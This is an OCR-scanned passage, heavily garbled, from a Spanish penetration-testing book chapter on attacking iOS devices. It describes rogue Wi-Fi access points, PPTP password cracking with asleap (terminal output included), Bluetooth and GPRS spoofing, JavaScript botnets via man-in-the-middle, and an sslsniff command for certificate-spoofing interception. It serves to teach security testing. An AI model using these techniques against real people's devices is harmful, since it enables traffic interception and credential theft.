operative  que  es  quien  realiza  las  solicitudes  de  datos.  Dcbido  a  esto,  los  sistemas  para  tomar  control 
de  un  terminal  iOS  han  sido  siempre  muy  limitados.  El  investigador  Charlie  Miller,  a  lo  largo  de  los 
ahos  ha  ido  encontrando  diferentes  fallos  en  el  navegador  o  en  el  sistema  de  SMS  para  conseguir 
ejeeutar  codigo  arbitrario  en'  el  dispositivo  y  tomar  el  control  del  mistno. 

En  el  ultimo  Mobile  Pwn 2 Own  de  septiembre  de  2012,  los  investigadores  Daan  Keuper  y  Joost  Pool 
encontraron  un  fallo  en  el  navegador  Mobile  Safari  que  les  permitio  tomar  control  de  los  dispositivos 
iOS.  Sin  embargo,  casi  ninguno  de  esos  exploits  es  publico,  y  solo  se  han  dado  explicaciones  de 
como  se  han  realizado,  utilizandose  esta  information  para  poder  hacer  herramientas  de  jailbreak. 


En  el  ano  2012,  la  revista  Forbes  hizo  im  estudio  cle  cuales  eran  los  exploits  mejor  pagados,  y  los 
de  los  terrain-ales  iOS  superaban  con  ereces  a  todos  los  demas  por  encima  de  los  de  las  m Aquinas 
Windows,  que  tradicionalmente  hablan  sido  los  mas  cotizados  en  el  mercado. 


]  ADOBE  READER  •  .  V 

$5,000-$30,006  . 

MAC  OSX 

$20,000-150,000 

ANDROID.  ■ 

.  $30.000-$60.000 

FLASH  OR  JAVA  BROWSER  PLUG-INS 

mooo-j-ioo.ooo 

MICROSOFT  WORD  ■ 

•:  $so,ooo-$ioo,oop . 

WINDOWS 

$60.000-$ 120.000 

FIREf, OX  Oft  SAFARI  .  v  :  .  .  :  , 

$60,000-$150,0tx) 

CHROME  OR  INTERNET  EXPLORER 

$80,000-1200,000 

IOS  - 

>100, 000-$250, 000  . 

Fig  8.09:  LisUi  de  precios  de  exploits  en  e!  mercado. 


A  pesar  de  que  no  hay  n-ingun  exploit  en  Metasploit,  si  que  se  eonocen  muchos  de  los  fal  los  que  liene 
cada  version  de  iOS,  ya  que  Apple  publica  en  cada  nueva  version  del  sistema  operalivo  la  iista  de 
codigos  CVE  solucionados,  lo  que  puede  ayudar  a  preparar  un  determinado  ataque  a  un pentester, 

Una  de  ias  superficies  de  exposicion  comunes  a  iOS,  Android  y  Windows  Phone  son  las  tiendas  de 
aplicaciones.  En  el  caso  de  Android  el  numero  de  aplicaciones  maliciosas  que  existen  es  enorme, 
por  lo  que  casi  no  es  noticia  nueva.  En  el  caso  de  iOS  no  son  demasiadas  las  que  se  han  encontrado, 
y  casi  todas  han  sido  de  robo  de  datos. 

El  unico  ejemplo  de  una  aplicacion  maliciosa  instalada  a  lraves  de  la  App  Store  es  de  Charlie 
Miller.  El  hizo  una  prueba  de  concepto  con  una  aplicacion  llamada  InstaStock  que  tras  pasar  los 
controles  y  estar  publicada  en  la  App  Store  e  instalada  en  un  dispositivo  movil,  se  convertla  en 
un  dropperf modulo  de  infection  que  descarga  el  autentico  software  malicioso)  para  instaiar  un 
backdoor  y  controlar  el  telAfono  reniotamente. 


Fig  8.1 0:  JnstaStock  la  Prueba  de  Concepto  de  Charly  Miller  que  se  sallo  el  Code-Signing  a  travels  de  la  AppStore. 


Capltulo  VIII.  Metasploit  en  dispositivos  movil  es 


Aparte  de  esta  prueba  de  concepto,  lo  mas  habitual  son  aplicaciones  que  mben  datos  como  la 
aplicacion  de  adware  Find  &  Call,  que  robaba  las  agendas  de  contactos  para  vender! as  en  campanas 
d 9  spam  de  correo  electronico  y  SMS.  Por  supuesto,  hay  que  saltar  ios  controles  d e  Apple  en  la  App 
Store ,  pero  ya  hay  casos  en  los  que  es  posible.  ' 

Er*  caso  de  que  el  terminal  tenga  hecbo  el  jailbreak,  se  ha  eliminado  el  proceso  de  verification 
de  software  firmado  por  Apple  en  el  terminal,  lo  que  permite  que  cualquier  aplicacion  pueda  ser 
ejeculada.  En  este  caso  es  mas  sencillo  instaiar  un  software  malicioso  en  el  terminal,  si  se  etmvcnce 
al  usuario  de  que  instale  una  aplicacion  publicada  en  un  repos itori o  de  internet. 

En  la  propia  Cydia ,  el  investigador  espanol  Eagle  descubrio  que  una  de  ias  aplicaciones  que  habta 
instalado  en  su  terminal,  y  que  procedtade  Cydia,  eslaba  haciendo  clic-jraud  a  lraves  de  su  terminal 
movil,  algo  que  dejo  en  entredicho  los  controles  de  estas  tiendas  de  aplicaciones  para  dispositivos 
con  jailbreak. 

Existen  casos  de  malware  para  equipos  con  jailbreak.  Hay  ejemplos  como  el  gusauo  iKee,  que  se 
dislribuia  via  OpenSSH  con  contrasehas  por  defecto  (algo  que  es  lo  primero  que  hay  que  mirar  en 
un  terminal  iOS  cow  jailbreak),  o  iKeyGuard ,  un  keylogger  especialmente  disehado  para  i()S,  que 
se  distribuye  por  Internet  para  vigilar  terminales  iOS  con  jailbreak,  en  diferentes  versiones  y  con 
distintas  caractcristicas. 
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Hiding  IKG  From  Cydia  yA  %/  j 

Character  Logging  */  •/  '■  </ 

'  ■  <  : 
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WhatsApp  Logging •  .  j-  .y.  ‘j  '  | 

Opened  Apps  Logging"  :  _ __  V'”  | 

Fig  8.11:  Versiones  de  iKeyGuard  para  iOS 


Por  supuesto,  adaptar  malware  de  OSX o  Linux  para  sistemas  IOS  no  es  tan  complicado  si  el  terminal 
liene  realizado  el  jailbreak,  asi  que  en  ataques  a  medida  son  muchas  las  soiuciones  a  emplear. 


Encontrar  terminales  con  jaiblreak  puede  ser  sencillo,  sobre  todo  si  estos  utilizan  las  funciones  que 
permiten  algunos  programas  como  lnstallous,  de  compartir  datos  via  servidores  web.  Buscando  en 
Shodan  equipos  con  Http  cuyo  banner  muestre  que  es  un  iPhone  es  sencillo,  y  deja  a  las  tiaras  que 
es  un  terminal  iPhone  con  jailbreak.  Este  mismo  truco  se  puede  realizar  en  un  escaneo  con  nmap 
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en  la  red  de  una  empresa,  para  ver  si,  o  bien  por  SSH  o  bien  por  Http,  se  ha  introducido  un  iOS  eon 
jailbrecik  en  la  organization. 

La  primera  c!e  las  cosas  que  es  interesante  es  que  Ios  dispositivos  iOS  int'orman  en  el  campo  User 
Agent,  de  ia  version  exacta  del  sistema  operativo,  con  lo  que  imicamente  consiguiendo  que  se  cargue 
una  imagen  en  un  correo  electronico  o  se  visite  una  pagina  web,  se  logra  conocer  la  version  exacta 
del  sistema  operativo  objetivo  de  la  action. 


Bn  la  ultima  version  de  iOS  6,  el  cliente  Mail  no  carga  las  imagenes  de  ningiin  correo,  pero  perm ite 
hacerlo  caso  a  caso,  es  clecir,  el  usuario  puede  elegir  cargar  las  imagenes  de  un  mensaje  de  correo  en 
particular  escrito  en  HTML,  pero  en  las  versiones  anteriores  esto  es  algo  que  se  hace  a  nivel  global 
y  por  defecto  estaba  activado,  lo  que  ayuda  a  conseguir  la  version  exacta  de  iOS. 


Conocida  la  version,  es  posible  intentar  localizar  exploits  publicos  para  terminales  iOS  utilizando  las 
bases  de  dates  CVE.  CVE  Details  es  una  web  que  perm  ite  navegar  por  los  expedientes  de  seguridad 
de  iOS  que  tienen  un  exploit  publicado,  lo  que  es  de  gran  utilidad.  En  la  imagen  se  puede  ver  una 
clasificacion  de  los  CVE  que  afectan  a  iOSy  y  solo  a  iOS,  ordenada  por  ano  de  deseubrimiento  y  por 
tipo  de  vtilnerabilidad.  ■ 


Si  se  seleceiona  la  vista  de  bugs  con  exploits  publicos,  se  puede  ver  que  hay  bastantes  exploits 
disponibles  para  atacar  a  terminales  iOS,  y  por  supuesto  se  pueden  conftgurar  para  utilizarlos  en 
detenu  inados  entornos. 
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,  Fig  8. 1 4:  Lista  de  expedientes  con  exploit  piiblico. 

Entre  el  los,  hay  que  destaear  el  bug  del  PDF  descubierto  por  Come x  que  fue  utilizado,  y  aim  ests 
disponible,  para  JaiibreakMe  3.0.  Hay  que  recordar  que  este  bug  funciona  en  todos  los  terminales 
hasta  version  iOS  4. 0. 1.  Dicho  bug  perm  ite,  mediante  la  aperture  de  im  PDF  ejecutar  codigo  arbitrario 
a  nivel  de  root  en  el  sistema  y,  entre  otras  cosas,  parchear  el  kernel  de  un  terminal  iOS  para  hacer 
jailbreak.  Sin  embargo,  es  posible  cambiar  el  payload  y  ejecutar  una  shell  a  traves  del  mismo.  El 
investigador  espanoi  Jose  Selvi,  realizo  una  demostracion  de  esto  eon  JctilOwnMe. 


*  '•  CV.Tj  .»of  Vulnerability  >u<rl<sli  ,1  Iffidats  pews  Gafnbd’  7.'tc«v'cOTpTei(  Autlion.  temfhjgn}  inteeVity  Avails’  j 

j  |  j  exploits  j  Typejs)  '  j  P*to.  Oslo  j;  ...  Across  l  ’  i  "•  ,  Ity-.i  Ucatton,  tlslily-  ..  blllty  J 

1  1  Overflow  2010-  3010-  Admin  Local  Medium  Not  Complete  Complete  Complet 

+Priv  00-05  OS- 1 B  required 

Integer  overflow  in  lOSurtace  in  Apple  iOS  before  4.0.2  on  the  iPhone  end  iPod  touch,  and  before  3.2.2  on  the  iPad,  allow*  local  users  to  gain 
privileges  via  vectors  involving  lOSurface  properties,  os  demonstrated  by  JaiibreakMe. 

2  CV^.'20,tO^/ny  U 5  1  DoS  Exec  2010-  2010-  None  Remote  Medium  Not  Complete  Complete  Complete  t 

Code  00-16  00-21  required 


Multiple  stack-bnsed  buffer  overflows  in  the  rff_decoder_parae_cbarstrings  function  in  the  CFF  TypeZ  CharStrings  interpreter  in  cff/cffgload.e  in 
Freetype  before  2.4.2,  as  used  in  Apple  ios  before  4.0.2  on  the  'Phone  and  iPod  touch  and  before  3.2.2  on  the  iPod,  allow  remote  attackers  to 
execute  arbitrary  code  or  cause  a  denial  of  service  (memory  corruption)  via  crafted  CFF  opcodes  in  embedded  fonts  in  a  PDF  document,  as 
demonstrated  by  JailhreakMe,  NOTE:  some  of  these  details  are  obtained  from  third  party  information- 

3  £J£tMlSci226  2£  t  DoS  2010-  2010-  None  Remote  Low  Not  None  None  Partial 

04-01  04-02  "  required 

The  HTTP  diet*  functionality  in  Apple  iPhone  OS  3.1  on  the  iPhone  2G  and  3.1.3  on  the  iPhone  3GS  allows  remote  attackers  to  cause  a  denial  of 
aetvioa -(Safari,  Mail,  or  Springboard  crash)  via  a  crafted jnnerHTML  property  of  a  DIV  element,  related  to  a  "malformed  character"  issue. 

4  CVF-?009~??71  22  1  DoS  20D9-  2009-  None  Remote  Medium  Not  None  None  Partial 

09-21  09-22  '  '■'**  required 

Apple  Safari  on  iPhone  OS  3.0.1  allows  remote  attackers  to  causa  a  denial  of  service  (application  crash)  via  a  long  tel:  URL  in  the  SRC  attribute 
of  an  I  FRAME  element, 

5  £VE|10flM52S  220  1  +info  2009-  2012-  None  Remote  Medium  Not  Complete  None  None 

06*10  03*30  required 

The  XSL  stylesheet  implementation  in  WebKit  in  Apple  Safari  before  4.0,  iPhone  GS  1.0  through  2.2.1,  and  iPhone  OS  for  iPod  touch  1,1 
through  2.2.1  does  nut  properly  handle  XML  external  entities,  which  allows  remote  attackors  to  read  arbitrary  Hies  via  a  crafted  DTD,  as 
.d?"!ens!fa<.el.bv’  *  f‘,tl7//etc/passwd  URL  in  an  entity  declaration,  related  to  on  "XXE  attack." 

6  CVE:2flQ9-1692  32S  1  DoS  2009-  2012-  mum  None  Remote  Medium  Not  None  None  Complete 

06-19  03-30  required 

WebKit  before  r41741,  as  used  fh  Apple  iPhone  OS  1.0  through  2.2.1,  iPhone  OS  For  iPod  touch  1.1  through  2,2.1,  Safari,  and  other  software, 
allows  remote  attackers  to  cause  a  denial  of  service  (memory  consumption  or  device  reset)  via  a  web  page  containing  on  HTMLSeleclElement 
object  with  a  large  length  attribute,  related  lo  the  length  property  of  a  Select  object. 

Fig  8.15:  Expediente  CVE-2010-1797. 
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Otra  forma  tie  atacar  a  Jos  usuarios  tie  iOS  es  mediante  los  bugs  de  Mobile  Safari  que  perm i ten 
ocultar  la  barra  de  navegacidn  para  hacer  ataques  de  phishing.  Con  SET,  es  posible  crear  difcrentes 
sitios  talsos  para,  mediante  enlaces  trucados  suplantar  sitios  web.  Bn  las  diferentes  versiones  de  iOS 
se  ban  ido  descubriendo  formas  de  hacer  esto,  por  ejemplo,  para  iOS  5.1  se  publico  el  CVE-2012- 
0674  que  pennitla  con  un  sencillo  cddigo  script  ocultar  la  barra  de  navegacidn  de  Mobile  Safari  y 
colocar  en  su  lugar  una  falsa,  simulando  asi  estar  situado  en  otro  sitio  web,  tal  y  como  se  ve  en  la 
imagen. 


Pig  8.16:  Address  Bar  Spoofing  en  iPhone. 

Hay  que  resaltar  que,  aunque  el  numero  de  exploits  disponibles  en  Metasploit  para  iOS  sea  nulo,  el 
ntimero  de  bugs  que  se  publican  en  cada  version  de  iOS  son  machos,  por  ejemplo,  en  iOS  6  se  han 
solucionado  197  bugs,  entre  los  que  se  encuentran  el  CVE-  2012-3730  descubierto  por  Angel  Prado 
para  manipular  los  archives  adjuntos  de  mensajes  de  correo  electrdnico  en  Mail  o  el  CVE-20 12-3744 
descubierto  por  pod2g  que  permite  hacer  SMS  Spoofing  en  un  iPhone. 

En  defmitiva,  si  el  objetivo  es  un  terminal  Apple  con  iOS,  lo  primero  que  hay  que  hacer  es  averiguar 
la  version  de  iOS  en  concrete,  y  a  continuacion  buscar  los  exploits  piiblicos  o  los  fallos  conocidos  de 
esa  version  para  preparar  un  ataque  a  medida. 

Atacar  las  comunicaciones  WiFi  de  dispositivos  iOS 

Los  terminates  iOS  adolecen  de  ciertas  limitaciones  en  la  gestion  de  las  redes  WiFi  que  los  hace 
propensos  a  ataques  depor  medio  do  Rogue  AP,  y  Rogue  WiFi.  Bsta  inseguridad  existe  principalmeiitc 
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en  la  politica  de  gestion  de  redes  conocidas  que  realiza  este  sistema  operativo  a  la  bora  de  coneclarse 
a  una  red  WiFi.  Por  defecto,  en  el  momento  en  que  un  terminal  con  sistema  operativo  iOS  tiene 
configurada  corno  “activa”  la  conexidn  WiFi,  el  dispositivo  intentara  conectarse  a  una  red  conocida. 

Este  comportamiento  no  se  puede  cambiar,  es  decir,  en  el  momento  en  que  este  activada  la  conexidn 
WiFi  el  dispositivo  buscara  una  red  conocida  y  se  conectara  a  ella.  Esta  politica  de  conexidn  a  redes 
conocidas  es  bastante  confusa  y  tiene  unos  failos  en  cuanto  a  politica  que  merece  la  pena  resaltar. 

Muchos  usuarios  confunden  el  selector  que  aparece  debajo  de  la  tista  de  redes  WiFi  con  un  selector 
booleano  de  conexidn  automatica,  pero  esto  no  es  asi.  Este  selector  sdlo  tiene  utilidad  cuando  no 
hay  una  red  conocida  cerca,  en  caso  tie  que  si  hubiera  dicha  red,  el  terminal  se  conectaria  siempre 
a  ella. 


Preguntar  ai  conectar 


Preguntar  al  conectar  Blllf 

Fig  8.  i  7:  Con  el  selector  encendido  se  coneclara  aulomdticiimente  a  las  redes  eonociclas. 


Solo  en  el  caso  de  que  no  exista  una  red  conocida  en  las  proximidades,  el  dispositivo  optara  por 
dos  politicas.  La  primera  de  ellas  mostrara,  mediante  un  cuadro  de  dialogo  tie  notilicaeidn  que 
saldra  por  encima  de  cualquier  aplicacidn  que  este  activa  en  ese  instante,  la  iista  de  las  redes  en  las 
proximidades,  para  que  el  tisuario  seieccione  la  que  desea  utilizar.  En  el  caso  de  que  no  este  active 
ese  selector,  el  tisuario  debera  situarse  en  el  panel  correspond iente  a  la  configuracion  de  reties  WiFi, 
y  seleccionarla  nmnualmeiite  en  el  modulo  relacionado  con  los  ajustes. 


El  problema  que  se  plan  tea  a  continuacion  es  saber  que  redes  son  las  que  un  dispositivo  WiFi  tiene 
aimacenadas  en  un  deterniinado  instante  corno  conocidas,  ya  que  el  sistema  operativo  iOS  no  las 
muestra.  Esta  Iista  de  redes  se  almacena  un  fichero  en  formato  SQLite  que  se  encuentra  en  la  ruta  / 
private/var/Keychains/keychain~2.db,  pero  desde  el  interfaz  grafico  es  imposible  consultarlo. 

En  dispositivos  con  jailbreak  es  posible  acceder  a  este  fichero  e  investigarlo  para  conocer  la  Iista  tie 
redes  existenies.  Ademas,  para  consultar  dicha  iista  junto  con  las  contrasenas  de  conexion  es  posible 
utilizar  alguna  herramienta  como  WiFi  Passwords. 

Ei  problema  no  es  sdlo  que  se  conectara  a  una  red  conocida  y  que  el  tisuario  no  sabe  cuales  son 
estas,  sino  que  tampoco  es  posible  deshacerse  de  las  redes  conocidas  con  facilidad,  ya  que  iog 
sdlo  permite  borrar  una  red  de  este  tipo  si  esta  en  las  proximidades,  en  caso  contrano,  no.es  posible 
eliminarlas  de  ia  Iista,  lo  que  obliga  a  modificar  manualmente  el  fichero  keychdid  °do  esto 
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implicit  puede  h fiber  una  red  conocida,  a  la  tjue  el  d ispositivo  fue  conectado  alguna  vez,  y  )a 
proxima  vez  que  la  encuentre  se  conectara.  1 

r.Cual  es  la  politics  de  election  de  red  a  la  Itora  de  realizar  una  coriexion?  Tras  hacer  multiples 
pruebas,  parece  que  los  dispositivos  con  iOS,  en  el  caso  de  que  hays  mas  de  una  red  WiFi  conocida 
en  las  proximidades,  el  terminal  diije  la  ultima  red  a  la  que  haya  sido  conectado,  es  decir,  parecen 
utilizin'  un  sistema  de  eleccion  LiFO  (Last  In  First  Out). 

Dicho  todo  esta,  para  preparar  un  ataque  de  Rogue  WiFi,  a  tin  ataeante  !o  que  le  hace  faita  es  saber 
como  el  terminal  reconoce  una  red  WiFi,  para  intentar  que  se  conecte  a  el  mismo,  y  tal  y  como 
fiincionan,  hay  una  ventaja  que  puede  utilizar  ei  pentesler.  Los  dispositivos  iOS  utilizan  el  SSID,  es 
decir,  el  nombre  de  la  red  WiFi,  y  la  tecnologia,  es  decir,  el  protocolo  de  cifrado  y  la  contrasena  de 
con  ex  ion  para  reconocer  una  red  y  conectarse  a  ella. 

Bsto  es  tin  problema  serio,  ya  que  deben'a  utilizarse  el  ESSJD  {Extended SSI D)  para  reconocer  la  red, 
y  no  solo  el  nombre.  Este  ESSID  tiene  la  estructura  de  una  direction  MAC,  y  sirve  para  comprobar 
si  se  esta  conectando  al  Access  Point  correcto,  o  este  ha  sido  cambiado.  En  redes  de  un  solo  punlo 
de  acceso,  este  valor  es  la  MAC  del  router,  pero  en  redes  con  roaming  es  una  direccion  MAC  virtual 
compartida  por  todos. 

Como  el  terminal  iOS  no  valida  el  ESSID  sino  el  SSID,  puede  lograrse  fdcilmente  que  el  dispositive 
se  conecte  a  una  falsa  red,  solo  porque  tenga  el  mismo  nombre  y  la  misma  configuration.  Todo 
este  funciqnamiento  descrito  puede  llevar  a  serios  riesgos  de  seguridad,  que  pueden  ser  dirigidoe  o 
aleatoriosjdependiendo  de  la  estrategia  del  ataeante. 

!  i  I 

Supongase  una  conferencia,  un  aeropuerto  o  cualquier  lugar  con  concentration  de  personas  en  las 
que  puedan  existir  terminates  Apple  eon  sistema  operativo  iOS.  Es  probable  que  muchos  de  ellos 
se  hayan  conectado  alguna  vez  a  una  red  WiFi  abierta,  llamada  Default,  Free  o  Public.  Todos  esos 
nombres  son  muy  comunes  en  espacios  publicos  u  hoteles,  por  to  que  es  probable  que  muchos 
usuarios  tengan  esa  red  en  su  lista  de  redes  conocidas.  Si  no  hay  otra  red  conocida  cerca,  esos 
dispositivos  se  conectaran  automaticamente  e  intentaran  enviar  y  recibir  dates  todas  las  aplicaciones, 
que  podrian  ser  interceptadas  por  el  ataeante  que  haya  puesto  el  punto  de  acceso  WiFi  falso. 

Este  mismo  ataque  puede  ser  hecho  de  forma  dirigida,  por  ejemplo,  entre  los  companeros  de  una 
empresa,  o  de  estabiecimientos,  como  cafeterias,  restaurantes,  hoteles.  Supongamos  un  entorno  en 
el  que  todos  los  miembros  conocen  la  contrasena  de  la  red  WiFi,  Si  uno  de  ellos  quisiera  atacar  a 
otro,  podrla  replicar  la  red  WiFi  que  ambos  conocen  en  otro  entorno,  donde  la  vlciirna  no  espere  que 
exista  esta  red,  haciendo  que  el  dispositivo  se  conecte  automaticamente  a  este  falso  punto  de  acceso. 

Si  el  ataque  es  dirigido,  utilizando  los  modulos  de  Metasploit  dentro  de  un  terminal  iOS,  es  posible 
acompanar  a  la  victima  e  ir  charlando  con  ella  mientras  nuestros  Rogue  AP  instalado  en  nuestro 
iPhone  le  otrece  en  todo  momenta  la  conexion  a  Internet  al  iPhone  de  la  victima  mediantc  una 
red  WiFi  Public.  El  terminal  de  la  victima  se  descargara  el  correo  electronico,  los  mensajes  de 
Whatsapp,  etc...  a  traves  del  Rogue  AP. 


Capitulo  VIII.  Metasploit  en  dispositivos  mdviies 


Atacar  ias  comunicaciones  VPN  de  iOS 

Una  de  las  protecciones  que  tienen  los  usuarios  de  iPhone  o  iPad,  es  la  de  conectarse  a  Internet 
por  medio  de  una  VPN,  ya  que  asl,  si  las  comunicaciones  son  interceptadas,  estas  no  podran  se1§ 
descifradas.  Sin  embargo,  las  redes  VPN  en  iOS  pueden  ser  atacadas  de  alguna  forma,  tal  y  como  stf 
muestra  a  continuacion.  \  * 

La  primera  de  las  maneras  es  aprovecharse  de  los  fallos  de  seguridad  descubiertos  en  el  protocol^ 
PPTP  {Point  to  Point  Tunneling  Protocol).  A  dia  de  hoy,  si  un  usuario  se  conecta  a  su  servidor  VP]\p 
a  traves  de  un  Rogue  AP  que  esta  grabando  todo  el  trafico,  es  posible  crackear  la  contrasena.  Esto  csf 
asi  debido  a  las  nuevas  vulnerabilidades  conocidas  en  la  arquitectura  PPTP  y  a  que  ademas  PPTP  no 
autentica  maqu  inas,  con  io  cual  es  posible  enrutar  el  trafico  de  una  VPN  con  esta  tecnologia  a  traves 
rie  una  maquina  de  grabacion  que  capture  todo  el  trafico. 


rootfjlbt! /p-8jjtest/wtf'elfi's6/«isla4fi#  ^/astcap  -K key  -n  ind^Xtkey  -R  54 

C9:l6:6A:«:Sl:«:66:a:«e:88:W:Sl:01;ftOtf8:7e:W  -C  ’  '  V- ’ 

asleap  2,2  -  actively  recover  IEAP/PPTP  passwords,  <jwrlght@Hasbora.co«» 

hash  bytes j  e634  '  • 

W  hash:  2O9c«74da4Mc0eM32f3fa5a7w«4  | 

password:  admin 

root^bt :  / peirte 5  tM  rote ss /as l  eap#  f 


Fig  8.1 8:  Crackeando  una  password  PTPP  con  asleap  en  BackTrack. 
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La  segunda  de  Ias  caracteflsticas  debiies  del  sistema  VPN  de  iOS  es  que  el  terminal,  si  pierde 
conexion  a  traves  de  la  VPN  no  avisa  al  usuario,  y  continua  enviando  trafico  sin  cifrar,  es  decir,  sin" 
utilizar  la  VPN.  Si  el  objetivo  esta  utilizando  un  sistema  de  conexion  VPN  robusto,  como  L2TP/j 
IPSec,  entonces  hay  que  intentar  aprovechar  esta  circunstancia.  A. esta  caracterlstica  es  posible 
sacaile  partido  haciendo  un  D.O.S.  al  servidor  VPN  para  que  se  caiga  la  conexion  con  el  cliente,  y  ■ 
luego  continuar  capturando  el  trafico  a  traves  del  sniffer,  esta  vez  sin  cifrar.  '  \ 


Atacar  las  comunicaciones  BlueTooth  de  un  iOS 

Las  comunicaciones  BlueTooth  son  muy  comunes  en  dispositivos  de  Cercania.  En  el  mundo  de  los 
terminals  iPhone  o  iPad,  son  comunmente  utilizados  con  sistemas  de  telefonia  manos  libres,  o 
teclados.  El  fatlo  en  los  terminales  iOS  es  que  de  fabrica,  la  gran  mayorla  de  modelos  de  iPhone  y  de 
iPad  tienen  la  direccion  BlueTooth  consecutiva  de  la  direccion  de  la  tarjeta  WiFi. 

La  direccion  de  la  tarjeta  WiFi  se  difunde  sin  ningun  tipo  de  precaucibn,  ya  que  en  teoria  solo  sirve 
para  indicar  la  direccion  del  terminal.  Sin  embargo,  la  direccion  BlueTooth  se  utiliza  como  validador 
estatico,  una  vez  que  dos  dispositivos  BlueTooth  han  sido  emparejados.  Por  ejemplo,  el  terminal 
iPhone  y  el  sistema  manos  libres  del  coche. 

Si  el  usuario  ha  enlazado  esos  dos  elemenitos,  un  ataeante  solo  necesitarla  saber  cual  es  la  direccion 
BlueTooth  del  iPhone  para  suplantarla  en  cualquier  otro  dispositivo  BlueTooth  y  conectarse  al 
sistema  de  manos  Jibres  sin  ningun  tipo  de  cbdigo. 


Fig  8. 1 9:  Direceiones  MAC  WiFi  y  BhieTootli  do  1111  iPhone. 
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A  diferencia  de  las  redes  3G,  la  uiiica  validacion  qtie  hace  el  terminal  a  una  red  GPRS  antes  de 
conectarse  es  la  del  nombre,  lo  que  para  un  atacante  suplantar  la  red  de  la  operadora  del  iPhone  es 
tan  sencillo  como  poner  el  mismo  nombre.  Algunos  tetefonos  permiten  bloquear  el  uso  de  redes 
GPRS,  pero  en  el  caso  de  iOS  no  hay  forma  de  forzar  el  uso  solo  de  redes  3G,  lo  que  sienipre  deja 
abierta  esta  puerta  al  atacante.  \ 

Una  vez  que  se  haya  conseguido  la  conexion  a  la  red  falsa  GPRS,  el  atacante  puede  manipular 
tanto  el  trail co  de  voz  como  de  dates,  haciendo  ataques  de  man  in  the  middle  en  GRPS  eomo  de 
suplantacion  de  numeros  de  liamadas  telefonicas. 


Ataques  man  in  the  middle  en  iOS 

Hasta  el  momenta,  muchos  de  los  ataques  descritos  hacen  referenda  a  un  esquema  de  man  in  the 
middle  en  lerminales  iOS,  lo  que  podda  ser  un  esquema  valido  para  robar  informacidn  y  manipular 
datos. 


Atacar  las  comunicaciones  3G  o  GPRS  de  iOS 

Una  de  las  formas  mas  habituates  que  tienen  los  usuafios  de  evitar  problemas  con  posibles  atacantes 
cercanos  es  trabajar  con  solo  la  conexion  GPRS  o  3G.  Si  el  objetivo  esta  trabajando  con  una  conexion 
3G  o  GPRS  estara  a  salvo  de  los  ataques  WiFi.  Sin  embargo,  si  no  ha  desactivado  !a  tarjeta  WiFi,  un 
atacante  podda  aprovecharse  del  diseno  de  conexion  automatica  para  crear  un  Rogue  AP  al  que  se 
conecte  el  terminal.  Si  un  dispositive  iOS  tiene  WiFi,  3G  y  GRPS,  se  coneclara  primero  pot  la  WiFi, 
y  luego  por  3G/GPRS,  por  lo  que  sin  avisar  al  usuario  coiiienzara  a  enviar  el  trafico  por  el  Rogue  AP. 

Si  el  usuario  ha  sido  suficientemente  preeavido  de  desactivar  la  WiFi,  que  hace  que  se  ahorre 
bateria,  que  no  sea  posible  detectarle  por  el  espectro  inalambrico  y  que  no  se  exponga  su  direction 
BlueTooth,  lo  unico  que  se  puede  hacer  es  un  ataque  con  una  estacion  BTS  falsa. 

Este  tipo  de  ataques  esta  descrito  correctamente  en  el  libro  de  “Hacking  de  Comunicaciones  Moviles: 
GSM/EDG E/GPRS”  de  David  y  Jose,  pero  basicamente  se  aprovecha  de  que  una  antena  de  lelefonia 
cercana  de  gran  potencia,  puede  anular  a  las  de  las  operadoras  de  telefonla  movil  cercanas  y  hacer 
que  el  terminal  se  conecte  a  la  antena  falsa,  en  lugar  de  a  la  operadora  real. 


Fig  8.20:  Estructura  de  ataque  man  in  the  middle  a  comunicaciones  GPRS  con  una  BTS  falsas. 


En  el  caso  de  conexiones  sin  cifrar,  ya  seat!  Http  (conexiones  a  webs  o  webservices),  es  posible 
consegun  mucha  intormacion'  de  apps  usadas  por  el  cliente  o  el  mismo  navegador.  Ademas  una  de 
las  formas  mas  sencillas  de  alargar  el  control  de  un  iPhone  sin  meter  un  malware  ni  tener  problemas 
con  las  protecciones  de  code-signing  en  iOS  consiste  en  usar  Botnets  en  Javascript. 

Este  tipo  de  botnets  se  aprovechan  del  esquema  de  hombre  en  medio  para  meter  un  payload  en 
todos  los  ficheros  Javascript  que  carga  una  pagina  web  que  se  va  a  conectar  a  un  panel  de  control 
paia  recibir  ordenes  desde  el.  La  victima  quedara  infectada  mientras  que  no  se  borne  la  cache  del 
navegador,  y  ei  atacante  podra  robar  las  pulsaciones  de  teclado,  hacer  ataques  de  phishing  o  robar 
las  cookies  de  sesion  de  todo  lo  que  pase  en  el  navegador. 

Uno  de  los  problemas  que  surgen  en  este  esquema  de  hombre  en  medio  es  la  existencia  de  conexiones 
web  con  Http-s,  que  puedan  evitar  la  intereeptacion  de  todo  el  trafico,  ya  sea  para  manipular  ficheros 
Javascript  o  para  interceptar  comunicaciones  de  cualquier  aplicacion. 

Sin  embargo  se  pueden  probar  dos  ataques  distintos:  SSLStrip  y  SSLSni/f,  am  bos  publicados  por  el 
investigador  Moxie  Malinspike.,  El  primero  de  ellos  es  muy  conocido,  y  su  objetivo  es  entregar  la 
pagina  en  HTTP  a  la  victima  y  ser  el  atacante  el  que  se  conecta  a  la  web  en  HTTPS.  Es  decir,  engana 
al  usuario  quitando  HTTPS  de  todas  las  conexiones.  Si  el  usuario  no  se  percata  o  la  web  esta  mal 
disenada  es  muy  facil  conseguir  que  una  victima  introduzca  datos  en  los  formularies. 

El  segundo  de  los  ataques  se  basa  en  una  vulnerabilidad  que  fue  pareheada  en  iOS  4.3.5  con  la 
validacion  de  los  certificados  digitales.  Este  bug  tiene  10  anos  y  Apple  cayo  en  el  hasta  la  citada 
version.  El  atacante  utilizara  un  certificado  digital  correcto,  pero  no  autorizado  para  general*  nuevos 
certificados,  para  generar  certificados  digitales  fatsos.  Si  el  cliente  no  valida  las  BasicConstraints ,  es 
decir,  las  limitaciones  que  tiene  el  certificado  utilizado,  no  se  dara  cuenta  de  que  se  esta  usando  un 
certificado  digital  no  autorizado  para  generar  nuevos  certificados.  Si  el  navegador  de  la  victima  es 
inferior  a  iOS  4.3.5,  se  puede  utilizar  SSLSniJfpara.  hacer  este  ataque  con  cualquier  certificado  valido 
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y  no  se  mostrara  ningnna  alerta.  El  comando  de  SSLsniff  que  hay  que  utilizar  para  las  versiones  de 
iOS  vulnerables  es: 

sslsniff  -a  -c  [path/to/your/certificate]  -f  ios  -h  [httpportl  -s  fsslport]  -w 
iphone . Jog 

Si  el  terminal  tiene  la  version  iOS  4.3.5,  entonces  no  se  pueden  utilizar  esos  certificados,  pero  si 
